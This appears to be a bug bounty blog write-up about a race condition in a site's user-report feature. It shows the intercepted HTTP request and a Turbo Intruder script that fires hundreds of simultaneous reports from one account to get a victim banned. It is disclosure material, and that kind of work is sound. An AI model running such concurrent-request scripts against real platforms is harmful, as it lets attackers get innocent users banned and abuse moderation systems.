Categories
Uncategorized

banning users Race condition

What is race condition ?

Multiple resources trying to access same resource.

example: you are booking a train ticket online and only a single seat ( assume seat no:5 ) is there. now you book a ticket for that seat and at the same time some other person from the different locations also booking the same seat, same time and you both booked the same seat ( seat no:5 ) and got seat booked for both you and other people this kind of issue is called a race condition. when multiple resources are trying to access the same resource at the same time.

CASE STUDY

As this was a private program all illustrations of vulnerabilities will be represented with the host as example.com

The application has a feature to report any person as inappropriate but you can report a person only one time.

to ban any user at-least 100 plus reports must be made as inappropriate so let’s try rate limit but failed.

POC ( RACE CONDITION )

visit the user account example.com/user/victim and click on report

intercept the request and send this to turbo intruder ( plugin by @albinowax )

HTTP request

POST /user/victim HTTP/1.1
Host: example
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/plain, /
Accept-Language: en-US,en;q=0.5
Referer: https://example.com
Content-Type: application/json;charset=utf-8
Authorization:
Content-Length: 22
Origin: https://example.com
Connection: keep-alive
Cookie:
{ json data }

turbo intruder script

def queueRequests(target, wordlists):
engine = RequestEngine(endpoint=target.endpoint,
concurrentConnections=30,
requestsPerConnection=100,
pipeline=True
)
for i in range(30):
engine.queue(target.req, target.baseInput,
gate='race1')
engine.openGate('race1')
engine.complete(timeout=60)
def handleResponse(req, interesting):
table.add(req)

and click on the attack once I send this I noticed that there are 20 — > 200 OKAY requests.

so I increased the range from 30 to 300 and I was able to send more than 100 plus report requests to the server and after 3 to 4 hrs of wait, the victim account was banned.

Reported –> Accepted –> P3 –> $dollar

2 replies on “banning users Race condition”

to ban any user you need to have (assume 100 reports ) against the account. and all the reports made should be from the different account but the developer was not checking whether the report was made from the same account or different account since they have have applied rate limit and thought there is no way to bypass it

Leave a Reply

Your email address will not be published. Required fields are marked *